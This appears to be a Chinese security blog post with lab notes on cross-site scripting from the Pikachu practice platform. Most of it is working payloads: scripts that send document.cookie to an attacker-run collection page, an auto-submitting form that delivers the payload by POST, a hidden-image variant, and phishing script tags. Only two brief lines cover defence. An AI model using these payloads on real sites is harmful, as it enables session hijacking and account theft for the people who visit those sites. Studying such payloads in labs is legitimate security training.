XSS

admin 2021年8月27日14:28:15评论80 views字数 1488阅读4分57秒阅读模式

跨站脚本攻击

XSS绕过-关于htmlspecial()函数的绕过

Htmlspecialchars():是PHP中关于预定字符如(&,“,<>,)转义为实体HTML

Htmlspecialchars($string,ENT_COMPAT/ENT_QUOTES/ENT_NOQUOTES)

要过滤的字符 ,可用的引号类型,默认仅编码双引号/编码双引号和单引号/不编码任何引号

绕过构造闭合单引号

Xsscookic

1
<script>document.location='http://192.168.43.155/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Post cookie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.43.155/pikachu-master/vul/xss/xsspost/xss_reflected_post.php">
<input id="xssr_in" type="text" name="message" value=
"<script>
document.location = 'http://192.168.43.155/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>"
/>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

<!--
*
<script>
document.write('<img src="http://127.0.0.1/antxss/xcookie/cookie.php?cookie='+document.cookie+'" width="0" height="0" border="0" />');
</script>
*/
/*
<script>
document.location = 'http://127.0.0.1/antxss/xcookie/cookie.php?cookie=' + document.cookie;
</script>
*/
-->

Xfish

1
2
<img src ="http://192.168.43.155/pkxss/xfish/fish.php" />
<script src ="http://192.168.43.155/pkxss/xfish/fish.php"></script>

防范

  1. 页面呈现转移
  2. 定制策略只允许用户加载某些资源(白名单)

注意

以上资料仅作信息防御技术使用,不得随意尝试,如有尝试,作者概不负责。

学习内容来源于pikachu。

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 密码保护:Nodejs安全从入门到入土

这是一篇受密码保护的文章,您需要提供访问密码: 密码: 相关推荐: Mybatis-plus框架常见SQL注入场景 一、关于Mybatis-plus   MyBatis-Plus (opens new window)(简称 MP)是一个 MyBatis (op…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日14:28:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSShttp://cn-sec.com/archives/475097.html

发表评论

匿名网友 填写信息